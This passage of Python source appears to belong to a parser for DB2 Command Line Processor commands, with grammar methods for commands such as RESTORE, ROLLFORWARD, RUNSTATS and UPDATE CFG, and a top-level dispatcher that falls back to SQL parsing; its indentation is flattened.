self._match('INDEXSCAN')
if self._match('LONGLOBDATA'):
if self._match('USE'):
self._expect(TT.IDENTIFIER)
self._match_one_of(['KEEPDICTIONARY', 'RESETDICTIONARY'])
def parse_index_clause():
if self._match('ALLOW'):
self._expect_one_of(['NO', 'WRITE', 'READ'])
self._expect('ACCESS')
if self._match_one_of(['CONVERT', 'CLEANUP']).value == 'CLEANUP':
self._expect('ONLY')
self._match_one_of(['ALL', 'PAGES'])
# REORG already matched
if self._match('TABLE'):
self._parse_table_name()
if self._match('RECLAIM'):
self._expect_sequence(['EXTENTS', 'ONLY'])
if self._match('ALLOW'):
self._expect_one_of(['READ', 'WRITE', 'NO'])
self._expect('ACCESS')
else:
parse_table_clause()
elif self._match('INDEX'):
self._parse_index_name()
if self._match('FOR'):
self._expect('TABLE')
self._parse_table_name()
parse_index_clause()
elif self._match('INDEXES'):
self._expect_sequence(['ALL', 'FOR', 'TABLE'])
self._parse_table_name()
parse_index_clause()
else:
self._expected_one_of(['TABLE', 'INDEX', 'INDEXES'])
if self._match_sequence(['ON', 'DATA', 'PARTITION']):
self._expect(TT.IDENTIFIER)
self._parse_db_partitions_clause()
def _parse_reorgchk_command(self):
"""Parses a REORGCHK command"""
# REORGCHK already matched
if self._match_one_of(['UPDATE', 'CURRENT']):
self._expect('STATISTICS')
if self._match('ON'):
if self._match('SCHEMA'):
self._expect(TT.IDENTIFIER)
elif self._match('TABLE'):
if not self._match_one_of(['SYSTEM', 'USER', 'ALL']):
self._parse_table_name()
else:
self._expected_one_of(['SCHEMA', 'TABLE'])
def _parse_reset_admin_cfg_command(self):
"""Parses a RESET ADMIN CFG command"""
# RESET ADMIN [CONFIGURATION|CONFIG|CFG] already matched
if self._match('FOR'):
self._expect('NODE')
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_reset_alert_cfg_command(self):
"""Parses a RESET ALERT CFG command"""
# RESET ALERT [CONFIGURATION|CONFIG|CFG] already matched
self._expect('FOR')
if (
self._match_sequence(['DATABASE', 'MANAGER'])
or self._match_sequence(['DB', 'MANAGER'])
or self._match_one_of(['DBM', 'CONTAINERS', 'DATABASES', 'TABLESPACES'])
):
pass
elif (
self._match_sequence(['CONTAINER', TT.IDENTIFIER, 'FOR', TT.IDENTIFIER])
or self._match_sequence('TABLESPACE', TT.IDENTIFIER)
or self._match('DATABASE')
):
self._expect('ON')
self._expect_clp_string()
if self._match('USING'):
self._expect_clp_string()
def _parse_reset_db_cfg_command(self):
"""Parses a RESET DB CFG command"""
# RESET [DATABASE|DB] [CONFIGURATION|CONFIG|CFG] already matched
self._expect('FOR')
self._expect_clp_string()
if self._match_one_of(['DBPARTITIONNUM', 'NODE']):
self._expect(TT.NUMBER)
def _parse_reset_dbm_cfg_command(self):
"""Parses a RESET DBM CFG command"""
# RESET [DATABASE MANAGER|DB MANAGER|DBM] [CONFIGURATION|CONFIG|CFG] already matched
pass
def _parse_reset_monitor_command(self):
"""Parses a RESET MONITOR command"""
# RESET MONITOR already matched
if self._match('ALL'):
self._match('DCS')
elif self._match('FOR'):
self._match('DCS')
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
else:
self._expected_one_of(['ALL', 'FOR'])
self._parse_db_partition_clause()
def _parse_restart_db_command(self):
"""Parses a RESTART DB command"""
# RESTART [DATABASE|DB] already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
if self._match('DROP'):
self._expect_sequence(['PENDING', 'TABLESPACES'])
self._expect('(')
while True:
self._expect(TT.IDENTIFIER)
if not self._match(','):
break
self._expect(')')
self._match_sequence(['WRITE', 'RESUME'])
def _parse_restore_db_command(self):
"""Parses a RESTORE DB command"""
# RESTORE [DATABASE|DB] already matched
self._expect_clp_string()
if self._match_one_of(['CONTINUE', 'ABORT']):
pass
else:
self._parse_login(optional=True, allowchange=False)
if self._match('TABLESPACE'):
self._expect('(')
self._parse_ident_list()
self._expect(')')
if self._match('SCHEMA'):
if self._match('('):
self._parse_ident_list()
self._expect(')')
self._match('ONLINE')
elif (
self._match_sequence(['HISTORY', 'FILE'])
or self._match_sequence(['COMPRESSION', 'LIBRARY'])
or self._match('LOGS')
):
self._match('ONLINE')
elif self._match('REBUILD'):
self._expect('WITH')
if self._match('ALL'):
self._expect_sequence(['TABLESPACES', 'IN'])
self._expect_one_of(['DATABASE', 'IMAGE'])
if self._match('EXCEPT'):
self._expect('TABLESPACE')
self._expect('(')
self._parse_ident_list()
self._expect(')')
else:
self._expect('TABLESPACE')
self._expect('(')
self._parse_ident_list()
self._expect(')')
if self._match('INCREMENTAL'):
self._match_one_of(['AUTO', 'AUTOMATIC', 'ABORT'])
if self._match('USE'):
self._match_one_of(['TSM', 'XBSA'])
if self._match('OPEN'):
self._expect(TT.NUMBER)
self._expect('SESSIONS')
if self._match('OPTIONS'):
self._expect_clp_string()
# XXX Add support for @filename response file
elif self._match('FROM'):
self._parse_clp_string_list()
elif self._match('LOAD'):
self._expect_clp_string()
if self._match('OPEN'):
self._expect(TT.NUMBER)
self._expect('SESSIONS')
if self._match('OPTIONS'):
self._expect_clp_string()
# XXX Add support for @filename response file
if self._match('TAKEN'):
self._expect('AT')
self._expect(TT.NUMBER)
if self._match('TO'):
self._expect_clp_string()
elif self._match('DBPATH'):
self._expect('ON')
self._expect_clp_string()
elif self._match('ON'):
self._parse_clp_string_list()
if self._match('DBPATH'):
self._expect('ON')
self._expect_clp_string()
if self._match('INTO'):
self._expect_clp_string()
if self._match('LOGTARGET'):
if self._match_one_of(['INCLUDE', 'EXCLUDE']):
self._match('FORCE')
else:
self._expect_clp_string()
if self._match('NEWLOGPATH'):
self._expect_clp_string()
if self._match('WITH'):
self._expect(TT.NUMBER)
self._expect('BUFFERS')
if self._match('BUFFER'):
self._expect(TT.NUMBER)
self._match_sequence(['REPLACE', 'HISTORY', 'FILE'])
self._match_sequence(['REPLACE', 'EXISTING'])
if self._match('REDIRECT'):
if self._match('GENERATE'):
self._expect('SCRIPT')
self._expect_clp_string()
if self._match('PARALLELISM'):
self._expect(TT.NUMBER)
if self._match('COMPRLIB'):
self._expect_clp_string()
if self._match('COMPROPTS'):
self._expect_clp_string()
self._match_sequence(['WITHOUT', 'ROLLING', 'FORWARD'])
self._match_sequence(['WITHOUT', 'PROMPTING'])
def _parse_rewind_tape_command(self):
"""Parses a REWIND TAPE command"""
# REWIND TAPE already matched
if self._match('ON'):
self._expect_clp_string()
def _parse_rollforward_db_command(self):
"""Parses a ROLLFORWARD DB command"""
# ROLLFORWARD [DATABASE|DB] already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
if self._match('TO'):
if self._match('END'):
self._expect('OF')
if self._expect_one_of(['LOGS', 'BACKUP']).value == 'BACKUP':
if self._match('ON'):
self._expect('ALL')
self._expect_one_of(['DBPARTITIONNUMS', 'NODES'])
else:
self._parse_db_partitions_clause()
else:
self._expect(TT.NUMBER)
if self._match('ON'):
self._expect('ALL')
self._expect_one_of(['DBPARTITIONNUMS', 'NODES'])
if self._match('USING'):
self._expect_one_of(['UTC', 'LOCAL'])
self._expect('TIME')
if self._match('AND'):
self._expect_one_of(['COMPLETE', 'STOP'])
elif self._match_one_of(['COMPLETE', 'STOP', 'CANCEL']):
self._parse_db_partitions_clause()
elif self._match('QUERY'):
self._expect('STATUS')
if self._match('USING'):
self._expect_one_of(['UTC', 'LOCAL'])
self._expect('TIME')
self._parse_db_partitions_clause()
if self._match('TABLESPACE'):
if not self._match('ONLINE'):
self._expect('(')
self._parse_ident_list()
self._expect(')')
self._match('ONLINE')
if self._match('OVERFLOW'):
self._expect_sequence(['LOG', 'PATH'])
self._expect('(')
self._expect_clp_string()
if self._match(','):
while True:
self._expect_clp_string()
self._expect('ON')
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
self._match('NORETRIEVE')
if self._match('RECOVER'):
self._expect_sequence(['DROPPED', 'TABLE'])
self._expect_clp_string()
self._expect('TO')
self._expect_clp_string()
def _parse_runstats_command(self):
"""Parses a RUNSTATS command"""
def parse_index_options():
"""Parses the indexing clauses of a RUNSTATS command"""
# FOR/AND already matched
if self._match('SAMPLED'):
self._expect('DETAILED')
else:
self._match('DETAILED')
self._expect_one_of(['INDEX', 'INDEXES'])
if not self._match('ALL'):
while True:
self._parse_index_name()
if not self._match(','):
break
def parse_column_options(dist):
"""Parses column options clauses of a RUNSTATS command"""
# ON already matched
if (
self._match_sequence(['ALL', 'COLUMNS', 'AND', 'COLUMNS'])
or self._match_sequence(['KEY', 'COLUMNS', 'AND', 'COLUMNS'])
or self._match('COLUMNS')
):
self._expect('(')
while True:
if self._match('('):
self._parse_ident_list()
self._expect(')')
else:
self._expect(TT.IDENTIFIER)
if self._match('LIKE'):
self._expect('STATISTICS')
if dist:
while self._match_one_of(['NUM_FREQVALUES', 'NUM_QUANTILES']):
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
else:
self._expect_one_of(['ALL', 'KEY', 'COLUMNS'])
self._expect('COLUMNS')
# RUNSTATS already matched
self._expect_sequence(['ON', 'TABLE'])
self._parse_table_name()
if self._match_one_of(['USE', 'UNSET']):
self._expect('PROFILE')
else:
if self._match('FOR'):
parse_index_options()
self._match_sequence(['EXCLUDING', 'XML', 'COLUMNS'])
else:
if self._match('ON'):
parse_column_options(dist=False)
if self._match('WITH'):
self._expect('DISTRIBUTION')
if self._match('ON'):
parse_column_options(dist=True)
if self._match('DEFAULT'):
while self._match_one_of(['NUM_FREQVALUES', 'NUM_QUANTILES']):
self._expect(TT.NUMBER)
self._match_sequence(['EXCLUDING', 'XML', 'COLUMNS'])
if self._match('AND'):
parse_index_options()
if self._match('ALLOW'):
self._expect_one_of(['READ', 'WRITE'])
self._expect('ACCESS')
if self._match('TABLESAMPLE'):
self._expect_one_of(['SYSTEM', 'BERNOULLI'])
self._expect('(')
self._expect(TT.NUMBER)
self._expect(')')
if self._match('REPEATABLE'):
self._expect('(')
self._expect(TT.NUMBER)
self._expect(')')
if self._match('SET'):
self._expect('PROFILE')
self._match_one_of(['NONE', 'ONLY'])
elif self._match('UPDATE'):
self._expect('PROFILE')
self._match('ONLY')
if self._match('UTIL_IMPACT_PRIORITY'):
self._match(TT.NUMBER)
def _parse_set_client_command(self):
"""Parses a SET CLIENT command"""
# SET CLIENT already matched
if self._match('CONNECT'):
self._expect(TT.NUMBER)
if self._match('DISCONNECT'):
self._expect_one_of(['EXPLICIT', 'CONDITIONAL', 'AUTOMATIC'])
if self._match('SQLRULES'):
self._expect_one_of(['DB2', 'STD'])
if self._match('SYNCPOINT'):
self._expect_one_of(['ONEPHASE', 'TWOPHASE', 'NONE'])
if self._match('CONNECT_DBPARTITIONNUM'):
self._expect_one_of(['CATALOG_DBPARTITIONNUM', TT.NUMBER])
if self._match('ATTACH_DBPARTITIONNUM'):
self._expect(TT.NUMBER)
def _parse_set_runtime_degree_command(self):
"""Parses a SET RUNTIME DEGREE command"""
# SET RUNTIME DEGREE already matched
self._expect('FOR')
if not self._match('ALL'):
self._expect('(')
while True:
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
self._expect('TO')
self._expect(TT.NUMBER)
def _parse_set_serveroutput_command(self):
"""Parses a SET SERVEROUTPUT command"""
# SET SERVEROUTPUT already matched
self._expect_one_of(['OFF', 'ON'])
def _parse_set_tablespace_containers_command(self):
"""Parses a SET TABLESPACE CONTAINERS command"""
# SET TABLESPACE CONTAINERS already matched
self._expect('FOR')
self._expect(TT.NUMBER)
if self._match_one_of(['REPLAY', 'IGNORE']):
self._expect_sequence(['ROLLFORWARD', 'CONTAINER', 'OPERATIONS'])
self._expect('USING')
if not self._match_sequence(['AUTOMATIC', 'STORAGE']):
self._expect('(')
while True:
if self._expect_one_of(['FILE', 'DEVICE', 'PATH']).value == 'PATH':
self._expect_clp_string()
else:
self._expect_clp_string()
self._expect(TT.NUMBER)
if not self._match(','):
break
self._expect(')')
def _parse_set_tape_position_command(self):
"""Parses a SET TAPE POSITION command"""
# SET TAPE POSITION already matched
if self._match('ON'):
self._expect_clp_string()
self._expect('TO')
self._expect(TT.NUMBER)
def _parse_set_util_impact_priority_command(self):
"""Parses a SET UTIL_IMPACT_PRIORITY command"""
# SET UTIL_IMPACT_PRIORITY already matched
self._expect('FOR')
self._expect(TT.NUMBER)
self._expect('TO')
self._expect(TT.NUMBER)
def _parse_set_workload_command(self):
"""Parses a SET WORKLOAD command"""
# SET WORKLOAD already matched
self._expect('TO')
self._expect_one_of(['AUTOMATIC', 'SYSDEFAULTADMWORKLOAD'])
def _parse_set_write_command(self):
"""Parses a SET WRITE command"""
# SET WRITE already matched
self._expect_one_of(['SUSPEND', 'RESUME'])
self._expect('FOR')
self._expect_one_of(['DATABASE', 'DB'])
def _parse_start_dbm_command(self):
"""Parses a START DBM command"""
# START [DATABASE MANAGER|DB MANAGER|DBM] already matched
if self._match('REMOTE'):
self._match('INSTANCE')
self._expect_clp_string()
self._expect_one_of(['ADMINNODE', 'HOSTNAME'])
self._expect_clp_string()
self._parse_login(optional=False, allowchange=False)
if self._match('ADMIN'):
self._expect('MODE')
if self._match_one_of(['USER', 'GROUP']):
self._expect(TT.IDENTIFIER)
self._match_sequence(['RESTRICTED', 'ACCESS'])
if self._match('PROFILE'):
self._expect_clp_string()
if self._match_one_of(['DBPARTITIONNUM', 'NODE']):
self._expect(TT.NUMBER)
if self._match('ADD'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect('HOSTNAME')
self._expect_clp_string()
self._expect('PORT')
self._expect(TT.NUMBER)
if self._match('COMPUTER'):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
if self._match('NETNAME'):
self._expect_clp_string()
if self._match('LIKE'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
elif self._match('WITHOUT'):
self._expect('TABLESPACES')
elif self._match('RESTART'):
if self._match('HOSTNAME'):
self._expect_clp_string()
if self._match('PORT'):
self._expect(TT.NUMBER)
if self._match('COMPUTER'):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
if self._match('NETNAME'):
self._expect_clp_string()
elif self._match('STANDALONE'):
pass
def _parse_start_hadr_command(self):
"""Parses a START HADR command"""
# START HADR already matched
self._expect('ON')
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
self._expect('AS')
if self._expect_one_of(['PRIMARY', 'STANDBY']).value == 'PRIMARY':
self._match_sequence(['BY', 'FORCE'])
def _parse_stop_dbm_command(self):
"""Parses a STOP DBM command"""
# STOP [DATABASE MANAGER|DB MANAGER|DBM] already matched
if self._match('PROFILE'):
self._expect_clp_string()
if self._match('DROP'):
self._expect_one_of(['DBPARTITIONNUM', 'NODE'])
self._expect(TT.NUMBER)
else:
self._match('FORCE')
if self._match_one_of(['DBPARTITIONNUM', 'NODE']):
self._expect(TT.NUMBER)
def _parse_stop_hadr_command(self):
"""Parses a STOP HADR command"""
# STOP HADR already matched
self._expect('ON')
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_takeover_hadr_command(self):
"""Parses a TAKEOVER HADR command"""
# TAKEOVER HADR already matched
self._expect('ON')
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
if self._match_sequence(['BY', 'FORCE']):
self._match_sequence(['PEER', 'WINDOW', 'ONLY'])
def _parse_terminate_command(self):
"""Parses a TERMINATE command"""
# TERMINATE already matched
pass
def _parse_uncatalog_command(self):
"""Parses an UNCATALOG command"""
if self._match_one_of(['DATABASE', 'DB', 'NODE']):
self._expect_clp_string()
elif self._match('DCS'):
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
elif self._match('LDAP'):
self._expect_one_of(['DATABASE', 'DB', 'NODE'])
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
elif self._match_one_of(['USER', 'SYSTEM']):
self._expect_sequence(['ODBC', 'DATA', 'SOURCE'])
self._expect_clp_string()
elif self._match('ODBC'):
self._expect_sequence(['DATA', 'SOURCE'])
self._expect_clp_string()
else:
self._expected_one_of([
'DATABASE',
'DB',
'NODE',
'DCS',
'LDAP',
'USER',
'SYSTEM',
'ODBC',
])
def _parse_unquiesce_command(self):
"""Parses an UNQUIESCE command"""
# UNQUIESCE already matched
if self._match('INSTANCE'):
self._expect_clp_string()
elif self._match_one_of(['DATABASE', 'DB']):
pass
else:
self._expected_one_of(['DATABASE', 'DB', 'INSTANCE'])
def _parse_update_admin_cfg_command(self):
"""Parses an UPDATE ADMIN CFG command"""
# UPDATE ADMIN CONFIGURATION|CONFIG|CFG already matched
self._expect('USING')
while True:
self._expect(TT.IDENTIFIER)
self._expect_one_of([TT.NUMBER, TT.STRING, TT.IDENTIFIER])
if self._peek_one_of(['FOR', TT.TERMINATOR, TT.EOF]):
break
if self._match_sequence(['FOR', 'NODE']):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_update_alert_cfg_command(self):
"""Parses an UPDATE ALERT CFG command"""
# UPDATE ALERT CONFIGURATION|CONFIG|CFG already matched
self._expect('FOR')
if (
self._match_sequence(['DATABASE', 'MANAGER'])
or self._match_sequence(['DB', 'MANAGER'])
or self._match_one_of(['DBM', 'CONTAINERS', 'DATABASES', 'TABLESPACES'])
):
pass
elif (
self._match_sequence(['CONTAINER', TT.IDENTIFIER, 'FOR', TT.IDENTIFIER])
or self._match_sequence('TABLESPACE', TT.IDENTIFIER)
or self._match('DATABASE')
):
self._expect('ON')
self._expect_clp_string()
if self._match('USING'):
self._expect_clp_string()
if self._match('SET'):
while True:
self._expect_one_of(['ALARM', 'WARNING', 'SENSITIVITY', 'ACTIONSENABLED', 'THRESHOLDSCHECKED'])
self._expect_one_of([TT.NUMBER, 'YES', 'NO'])
if not self._match(','):
break
elif self._match('ADD'):
while True:
self._expect_one_of(['SCRIPT', 'TASK'])
self._expect_clp_string()
self._expect('TYPE')
if self._match('DB2'):
if (
self._match_sequence(['STATEMENT', 'TERMINATION', 'CHARACTER'])
or self._match_sequence(['STMT', 'TERM', 'CHAR'])
or self._match_sequence(['TERM', 'CHAR'])
):
self._expect_clp_string()
elif self._match_sequence(['OPERATING', 'SYSTEM']) or self._match('OS'):
if (
self._match_sequence(['COMMAND', 'LINE', 'PARAMETERS'])
or self._match('PARMS')
):
self._expect_clp_string()
else:
self._expected_one_of(['DB2', 'OS', 'OPERATING'])
self._expect_sequence(['WORKING', 'DIRECTORY'])
self._expect_clp_string()
self._expect('ON')
if self._expect_one_of(['WARNING', 'ALARM', 'ALLALERT', 'ATTENTION']).value == 'ATTENTION':
self._expect(TT.NUMBER)
if self._match('ON'):
self._expect_clp_string()
self._parse_login(optional=False, allowchange=False)
if not self._match(','):
break
else:
if self._expect_one_of(['SET', 'ADD', 'UPDATE', 'DELETE']).value == 'UPDATE':
update = True
self._expect('ACTION')
while True:
self._expect_one_of(['SCRIPT', 'TASK'])
self._expect_clp_string()
self._expect('ON')
if self._expect_one_of(['WARNING', 'ALARM', 'ALLALERT', 'ATTENTION']).value == 'ATTENTION':
self._expect(TT.NUMBER)
if update:
while True:
self._expect('SET')
self._expect_one_of(['ALARM', 'WARNING', 'SENSITIVITY', 'ACTIONSENABLED', 'THRESHOLDSCHECKED'])
self._expect_one_of([TT.NUMBER, 'YES', 'NO'])
if not self._match(','):
break
if not self._match(','):
break
def _parse_update_alternate_server_command(self):
"""Parses an UPDATE ALTERNATE SERVER command"""
# UPDATE ALTERNATE SERVER already matched
self._expect('FOR')
if self._expect_one_of(['LDAP', 'DATABASE', 'DB']).value == 'LDAP':
self._expect_one_of(['DATABASE', 'DB'])
self._expect_clp_string()
self._expect('USING')
self._expect_one_of(['NODE', 'GWNODE'])
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
else:
self._expect_clp_string()
self._expect_sequence(['USING', 'HOSTNAME'])
self._expect_clp_string()
self._expect('PORT')
self._expect_clp_string()
def _parse_update_cli_cfg_command(self):
"""Parses an UPDATE CLI CFG command"""
# UPDATE CLI CONFIGURATION|CONFIG|CFG already matched
if self._match('AT'):
self._expect_one_of(['GLOBAL', 'USER'])
self._expect('LEVEL')
self._expect_sequence(['FOR', 'SECTION'])
self._expect_clp_string()
self._expect('USING')
while True:
self._expect(TT.IDENTIFIER)
self._expect_one_of([TT.NUMBER, TT.STRING, TT.IDENTIFIER])
if self._peek_one_of([TT.TERMINATOR, TT.EOF]):
break
def _parse_update_command_options_command(self):
"""Parses an UPDATE COMMAND OPTIONS command"""
# UPDATE COMMAND OPTIONS already matched
self._expect('USING')
while True:
option = self._expect_one_of([
'A', 'C', 'D', 'E', 'I', 'L', 'M', 'N',
'O', 'P', 'Q', 'R', 'S', 'V', 'W', 'Z',
]).value
value = self._expect_one_of(['ON', 'OFF']).value
if option in ('E', 'L', 'R', 'Z') and value == 'ON':
self._expect_clp_string()
if self._peek_one_of([TT.TERMINATOR, TT.EOF]):
break
def _parse_update_contact_command(self):
"""Parses an UPDATE CONTACT command"""
# UPDATE CONTACT already matched
self._expect_clp_string()
self._expect('USING')
while True:
if self._match('ADDRESS'):
self._expect_clp_string()
elif self._match('TYPE'):
self._expect_one_of(['EMAIL', 'PAGE'])
elif self._match('MAXPAGELEN'):
self._expect(TT.NUMBER)
elif self._match('DESCRIPTION'):
self._expect_clp_string()
else:
self._expected_one_of(['ADDRESS', 'TYPE', 'MAXPAGELEN', 'DESCRIPTION'])
if not self._match(','):
break
def _parse_update_contactgroup_command(self):
"""Parses an UPDATE CONTACTGROUP command"""
# UPDATE CONTACTGROUP already matched
self._expect_clp_string()
self._expect('(')
while True:
self._expect_one_of(['ADD', 'DROP'])
self._expect_one_of(['CONTACT', 'GROUP'])
self._expect_clp_string()
if not self._match(','):
break
self._expect(')')
if self._match('DESCRIPTION'):
self._expect_clp_string()
def _parse_update_db_cfg_command(self):
"""Parses an UPDATE DB CFG command"""
# UPDATE DATABASE|DB CONFIGURATION|CONFIG|CFG already matched
if self._match('FOR'):
self._expect_clp_string()
if self._match_one_of(['DBPARTITIONNUM', 'NODE']):
self._expect(TT.NUMBER)
self._expect('USING')
while True:
self._expect(TT.IDENTIFIER)
if self._match_one_of(['AUTOMATIC', 'MANUAL']):
pass
else:
self._expect_one_of([TT.NUMBER, TT.STRING, TT.IDENTIFIER])
self._match('AUTOMATIC')
if self._peek_one_of(['IMMEDIATE', 'DEFERRED', TT.TERMINATOR, TT.EOF]):
break
self._match_one_of(['IMMEDIATE', 'DEFERRED'])
def _parse_update_dbm_cfg_command(self):
"""Parses an UPDATE DBM CFG command"""
# UPDATE DATABASE MANAGER|DB MANAGER|DBM CONFIGURATION|CONFIG|CFG already matched
self._expect('USING')
while True:
self._expect(TT.IDENTIFIER)
if self._match_one_of(['AUTOMATIC', 'MANUAL']):
pass
else:
self._expect_one_of([TT.NUMBER, TT.STRING, TT.IDENTIFIER])
self._match('AUTOMATIC')
if self._peek_one_of(['IMMEDIATE', 'DEFERRED', TT.TERMINATOR, TT.EOF]):
break
self._match_one_of(['IMMEDIATE', 'DEFERRED'])
def _parse_update_notification_list_command(self):
"""Parses an UPDATE NOTIFICATION LIST command"""
# UPDATE [HEALTH] NOTIFICATION [CONTACT] LIST already matched
first = True
while True:
if not self._match_one_of(['ADD', 'DROP']):
if not first:
break
else:
self._expected_one_of(['ADD', 'DROP'])
first = False
self._expect_one_of(['CONTACT', 'GROUP'])
self._expect_clp_string()
def _parse_update_history_command(self):
"""Parses an UPDATE HISTORY command"""
# UPDATE HISTORY already matched
self._expect_one_of(['FOR', 'EID'])
self._expect(TT.NUMBER)
self._expect('WITH')
if self._match('LOCATION'):
self._expect_clp_string()
self._expect_sequence(['DEVICE', 'TYPE'])
self._expect_one_of(['D', 'K', 'T', 'A', 'F', 'U', 'P', 'N', 'X', 'Q', 'O'])
elif self._match('COMMENT'):
self._expect_clp_string()
elif self._match('STATUS'):
self._expect_one_of(['A', 'I', 'E', 'D', 'X'])
else:
self._expected_one_of(['LOCATION', 'COMMENT', 'STATUS'])
def _parse_update_ldap_node_command(self):
"""Parses an UPDATE LDAP NODE command"""
# UPDATE LDAP NODE already matched
self._expect_clp_string()
if self._match('HOSTNAME'):
self._expect_clp_string()
if self._match('SVCENAME'):
self._expect_clp_string()
if self._match('WITH'):
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
def _parse_update_monitor_switches_command(self):
"""Parses an UPDATE MONITOR SWITCHES command"""
# UPDATE MONITOR SWITCHES already matched
self._expect('USING')
first = True
while True:
if not self._match_one_of(['BUFFERPOOL', 'LOCK', 'SORT', 'STATEMENT', 'TABLE', 'TIMESTAMP', 'UOW']):
if not first:
break
else:
self._expected_one_of(['BUFFERPOOL', 'LOCK', 'SORT', 'STATEMENT', 'TABLE', 'TIMESTAMP', 'UOW'])
first = False
self._expect_one_of(['OFF', 'ON'])
self._parse_db_partition_clause()
def _parse_update_xmlschema_command(self):
"""Parses an UPDATE XMLSCHEMA command"""
# UPDATE XMLSCHEMA already matched
self._parse_subschema_name()
self._expect('WITH')
self._parse_subschema_name()
self._match_sequence(['DROP', 'NEW', 'SCHEMA'])
def _parse_upgrade_db_command(self):
"""Parses an UPGRADE DB command"""
# UPGRADE DATABASE|DB already matched
self._expect_clp_string()
self._parse_login(optional=True, allowchange=False)
# COMPOUND COMMANDS ######################################################
def _parse_command(self):
"""Parses a top-level CLP command in a DB2 script"""
# Ambiguity: Some CLP commands start with the same keywords as SQL
# statements (e.g. CREATE DATABASE and CREATE DATABASE PARTITION
# GROUP). Attempt to parse the statement as a CLP statement, rewind
# and try to parse as an SQL command if that fails. This is one reason
# for the message "The command was processed as an SQL statement
# because it was not a valid Command Line Processor command" in DB2;
# there are two very different and separate parsers, one for CLP which
# tries to parse a command first, which defers to the secondary SQL
# parser if it fails.
self._save_state()
try:
if self._match('ACTIVATE'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_activate_database_command()
elif self._match('ATTACH'):
self._parse_attach_command()
elif self._match('AUTOCONFIGURE'):
self._parse_autoconfigure_command()
elif self._match('BACKUP'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_backup_command()
elif self._match('CATALOG'):
self._parse_catalog_command()
elif self._match('CONNECT'):
self._parse_connect_command()
elif self._match('CREATE'):
if self._match_one_of(['DATABASE', 'DB']):
if self._match('PARTITION'):
raise ParseBacktrack()
self._parse_create_database_command()
elif self._match('TOOLS'):
self._expect('CATALOG')
self._parse_create_tools_catalog_command()
else:
raise ParseBacktrack()
elif self._match('DEACTIVATE'):
self._expect_one_of(['DATABASE', 'DB'])
self._parse_deactivate_database_command()
elif self._match('DETACH'):
self._parse_detach_command()
elif self._match('DISCONNECT'):
self._parse_disconnect_command()
elif self._match('DROP'):
if self._match_one_of(['DATABASE', 'DB']):
self._parse_drop_database_command()
elif self._match('TOOLS'):
self._expect('CATALOG')
self._parse_drop_tools_catalog_command()
else:
raise ParseBacktrack()
elif self._match('ECHO'):
self._parse_echo_command()
elif self._match('EXPORT'):
self._parse_export_command()
elif self._match('FORCE'):
self._expect('APPLICATION')
self._parse_force_application_command()
elif self._match('GET'):
if self._match('ADMIN'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_get_admin_cfg_command()
elif self._match('ALERT'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_get_alert_cfg_command()
elif self._match('CLI'):
self._expect_one_of(['CONFIGURATION', 'CONFIG', 'CFG'])
self._parse_get_cli_cfg_command()
elif self._match('CONNECTION'):
self._expect('STATE')
self._parse_get_connection_state_command()
elif self._match('CONTACTGROUP'):
self._parse_get_contactgroup_command()
elif self._match('CONTACTGROUPS'):
self._parse_get_contactgroups_command()
elif self._match('CONTACTS'):
self._parse_get_contacts_command()
elif self._match_one_of(['DATABASE', 'DB']):
if self._match_one_of(['CONFIGURATION', 'CONFIG', 'CFG']):
self._parse_get_db_cfg_command()
elif self._match('MANAGER'):
if self._match_one_of(['CONFIGURATION', 'CONFIG', 'CFG']):
self._parse_get_dbm_cfg_command()
elif self._match_sequence(['MONITOR', 'SWITCHES']):
self._parse_get_dbm_monitor_switches_command()
else:
self._expected_one_of(['CONFIGURATION', 'CONFIG', 'CFG', 'MONITOR'])
elif self._match('DBM'):
if self._match_one_of(['CONFIGURATION', 'CONFIG', 'CFG']):
self._parse_get_dbm_cfg_command()
elif self._match_sequence(['MONITOR', 'SWITCHES']):
self._parse_get_dbm_monitor_switches_command()
else:
self._expected_one_of(['CONFIGURATION', 'CONFIG', 'CFG', 'MONITOR'])
elif self._match('DESCRIPTION'):
self._expect_sequence(['FOR', 'HEALTH', 'INDICATOR'])
self._parse_get_description_for_health_indicator_command()
elif self._match('HEALTH'):
if self._match('NOTIFICATION'):
self._expect_sequence(['CONTACT', 'LIST'])
self._parse_get_notification_list_command()
elif self._match('SNAPSHOT'):
self._parse_get_health_snapshot_command()
else:
self._expected_one_of(['NOTIFICATION', 'SNAPSHOT'])
elif self._match('INSTANCE'):
self._parse_get_instance_command()
elif self._match('MONITOR'):
self._expect('SWITCHES')
self._parse_get_monitor_switches_command()
elif self._match('NOTIFICATION'):
self._expect('LIST')
self._parse_get_notification_list_command()
elif self._match('RECOMMENDATIONS'):
self._expect_sequence(['FOR', 'HEALTH', 'INDICATOR'])
self._parse_get_recommendations_for_health_indicator_command()
elif self._match('ROUTINE'):
self._parse_get_routine_command()
elif self._match('SNAPSHOT'):
self._parse_get_snapshot_command()
else:
raise ParseBacktrack()
elif self._match('IMPORT'):
self._parse_import_command()
elif self._match('INITIALIZE'):
